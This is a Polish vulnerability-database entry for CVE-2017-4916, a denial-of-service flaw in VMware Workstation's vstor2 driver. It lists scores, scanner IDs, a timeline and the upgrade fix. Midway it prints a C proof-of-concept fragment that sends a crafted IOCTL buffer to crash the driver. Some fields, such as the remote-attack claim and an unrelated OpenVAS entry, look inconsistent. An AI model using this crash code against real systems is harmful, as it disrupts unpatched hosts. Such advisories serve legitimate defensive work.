VMware Workstation Pro/Player do 12.5.5 vstor2 Driver denial of service

CVSS Wynik metatemperaturyExploit Aktualna Cena (≈)Wynik odsetkowy CTI
6.3$0-$5k0.00

Odkryto lukę w VMware Workstation Pro i Player do 12.5.5 (Virtualization Software). Dotknięta jest nieznana funkcja w komponencie vstor2 Driver. Poprzez manipulowanie przy użyciu nieznanych danych wejściowych można doprowadzić do wystąpienia podatności odmowa usługi. Wpływa to na dostępność.

Błąd został odkryty w dniu 2017-05-18. Informacja o podatności została opublikowana w dniu upubliczniona 2017-05-18 jako VMSA-2017-0009 w formie potwierdzone security advisory (Website). Raport na temat podatności został udostępniony pod adresem vmware.com. Podatność ta jest zwana CVE-2017-4916. Atak może zostać zainicjowany zdalnie. Eksploitacja nie wymaga żadnej formy uwierzytelnienia. Szczegóły techniczne są nieznane, ale publiczny exploit jest dostępny.

Exploit został stworzony przez Borja Merino i opublikowany później 3 tygodni, niż raport o błędzie. Exploit można ściągnąć pod adresem exploit-db.com. Uważa się go za proof-of-concept. Skaner podatności Nessus jest wyposażony w plugin ID 100418 (VMware Workstation 12.x < 12.5.6 vstor2 Driver NULL Pointer Dereference DoS (VMSA-2017-0009)), który pomaga ustalić, czy dane środowisko jest podatne na atak. Kod uzywany jest przez wykorzystanie:

void ioctl_crash()
{
    HANDLE hfile;
    WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
    DWORD dummy;
    char reply[0x3FDC];
    hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
    DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
}
 
void run_vix()
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    RtlZeroMemory(&si, sizeof(si));
    RtlZeroMemory(&pi, sizeof(pi));
    si.dwFlags |= STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    DWORD createFlags = CREATE_SUSPENDED;
    CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}

Aktualizacja do wersji 12.5.6 eliminuje tę podatność. Potencjalne zabezpieczenie zostało opublikowane po ujawnieniu podatności.

Błąd jest również udokumentowany w bazie podatności Tenable (100418) i Exploit-DB (42140).

Produktinfo

Rodzaj

Sprzedawca

Imię

Wersja

Licencja

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Wektor: 🔍
VulDB Niezawodność: 🔍

CVSSv3info

VulDB Wynik metabazy: 7.0
VulDB Wynik metatemperatury: 6.6

VulDB Wynik podstawowy: 7.5
VulDB Wynik tymczasowy: 6.7
VulDB Wektor: 🔍
VulDB Niezawodność: 🔍

NVD Wynik podstawowy: 6.5
NVD Wektor: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
WektorMożliwość wykorzystaniaUwierzytelnianiePoufnośćIntegralnośćDostępność
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować

VulDB Wynik podstawowy: 🔍
VulDB Wynik tymczasowy: 🔍
VulDB Niezawodność: 🔍

NVD Wynik podstawowy: 🔍

Exploitinfo

Klasa: Odmowa usługi
CWE: CWE-476 / CWE-404
CAPEC: 🔍
ATT&CK: 🔍

Lokalny: Nie
Zdalny: Tak

Dostępność: 🔍
Dostęp: Publiczny
Status: Proof-of-Concept
Autor: Borja Merino
Pobierać: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Przewidywanie ceny: 🔍
Aktualny szacunek cena: 🔍

0-Dayodblokowaćodblokowaćodblokowaćodblokować
Dzisiajodblokowaćodblokowaćodblokowaćodblokować

Nessus ID: 100418
Nessus Imię: VMware Workstation 12.x < 12.5.6 vstor2 Driver NULL Pointer Dereference DoS (VMSA-2017-0009)
Nessus Plik: 🔍
Nessus Ryzyko: 🔍
Nessus Family: 🔍
Nessus Context: 🔍

OpenVAS ID: 801912
OpenVAS Imię: Multiple VMware Workstation Products DLL Loading Local Privilege Escalation Vulnerability (Linux)
OpenVAS Plik: 🔍
OpenVAS Family: 🔍

Qualys ID: 🔍
Qualys Imię: 🔍

Exploit-DB: 🔍

Inteligencja Zagrożeńinfo

Wysiłek: 🔍
Aktywni aktorzy: 🔍
Aktywne grupy APT: 🔍

Przeciwdziałanieinfo

Zalecane: Upgrade
Status: 🔍

Czas reakcji: 🔍
0-dniowy czas: 🔍
Czas ekspozycji: 🔍
Wykorzystaj czas opóźnienia: 🔍

Upgrade: Workstation Pro/Player 12.5.6

Oś czasuinfo

2016-12-26 🔍
2017-05-18 +143 dni 🔍
2017-05-18 +0 dni 🔍
2017-05-18 +0 dni 🔍
2017-05-18 +0 dni 🔍
2017-05-19 +1 dni 🔍
2017-05-21 +2 dni 🔍
2017-05-22 +1 dni 🔍
2017-05-25 +3 dni 🔍
2017-06-08 +14 dni 🔍
2017-06-08 +0 dni 🔍
2020-12-25 +1296 dni 🔍

Źródłainfo

Sprzedawca: vmware.com

Raport: VMSA-2017-0009
Badacz: Borja Merino
Status: Potwierdzone
Potwierdzenie: 🔍

CVE: CVE-2017-4916 (🔍)
SecurityTracker: 1038526
SecurityFocus: 98560 - Multiple VMware Workstation Products CVE-2017-4916 Denial of Service Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20060413
Zobacz także: 🔍

Wpisinfo

Stworzono: 2017-05-21 13:51
Aktualizacje: 2020-12-25 09:11
Zmiany: 2017-05-21 13:51 (89), 2019-10-16 09:49 (5), 2020-12-25 09:04 (2), 2020-12-25 09:11 (1)
Kompletny: 🔍

Dyskusja

Brak komentarzy. Języki: pl + en.

Zaloguj się, aby skomentować.

PoprzedniPrzeglądKolejny

Do you need the next level of professionalism?

Upgrade your account now!